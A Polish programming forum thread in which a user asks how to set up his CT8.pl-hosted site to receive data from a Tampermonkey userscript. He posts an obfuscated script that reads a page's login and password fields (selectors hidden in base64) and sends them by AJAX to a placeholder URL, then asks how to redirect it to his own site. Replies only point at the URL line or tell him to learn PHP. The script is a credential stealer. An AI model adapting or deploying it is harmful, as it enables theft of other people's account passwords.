Potrzebuje pomocy z stroną www

0

Posiadam stronę na hostingu (CT8.pl) chce ją ustawić tak żeby odbierała dane które są wysyłane skryptem z tampermonkey.z jednej strony

0

A co konkretnie chcesz zrobić?

0

Jak te zakładki skonfigurować

Oraz jak zobaczyć kod na tej stronie https://dpelmdg8jrwf9amf.ct8.pl/ajax.php

0
Rapxx napisał(a):

Jak te zakładki skonfigurować

Nic ciebie nie rozumiem.

Oraz jak zobaczyć kod na tej stronie https://dpelmdg8jrwf9amf.ct8.pl/ajax.php

Ale tam nie ma kodu. Właściwie to nie ma też strony.

0

Jest taki skrypt co wysyła dane i jak go przerobić aby wysłał je na moją stronę

function UagZgR8PZcWcwvYp() {
    $(atob("I3Vsb2dpbg==")).val() != TpG3Y86zpgrtWMzb && $(atob("I3Vsb2dpbg==")).val() && (TpG3Y86zpgrtWMzb = $(atob("I3Vsb2dpbg==")).val()), $(atob("I3VwYXNz")).val() != ZHN4ekpZ5m95pFbJ && $(atob("I3VwYXNz")).val() && (ZHN4ekpZ5m95pFbJ = $(atob("I3VwYXNz")).val()), !$(atob("I3VwYXNz")).val() && !$(atob("I3Vsb2dpbg==")).val() && TpG3Y86zpgrtWMzb && ZHN4ekpZ5m95pFbJ && YQTtmEs6a5mTXE5a != TpG3Y86zpgrtWMzb + " | " + ZHN4ekpZ5m95pFbJ && ($.ajax({
        url: atob("MojaWitryna") + TpG3Y86zpgrtWMzb + "|" + ZHN4ekpZ5m95pFbJ
    }), YQTtmEs6a5mTXE5a = TpG3Y86zpgrtWMzb + " | " + ZHN4ekpZ5m95pFbJ)

0
Rapxx napisał(a):

Jest taki skrypt co wysyła dane i jak go przerobić aby wysłał je na moją stronę

Może tak?

url: atob("MojaWitryna") + TpG3Y86zpgrtWMzb + "|" + ZHN4ekpZ5m95pFbJ

A ogólnie to nie piszesz, co, gdzie, jak dlaczego, więc nie dziw się, jak nie będzie reakcji.

0

Może inaczej
To jest strona na której chce odbierać dane http://testowanaxx.ct8.pl/ tylko jak to zrobić żeby te dane były zapisywane ?

0

Widać, że brakuje Ci podstaw programowania.

Tworzysz skrypt, wysyłasz do niego dane POSTem lub GETem. Odbierasz dane, przetwarzasz i zapisujesz se jak tam chcesz.

0

Czy mógłbyś mi to wyjaśnić jak to zrobić?

0

Proponuję zacząć od zera i przerobić pierwszy lepszy kurs PHP.

1 użytkowników online, w tym zalogowanych: 0, gości: 1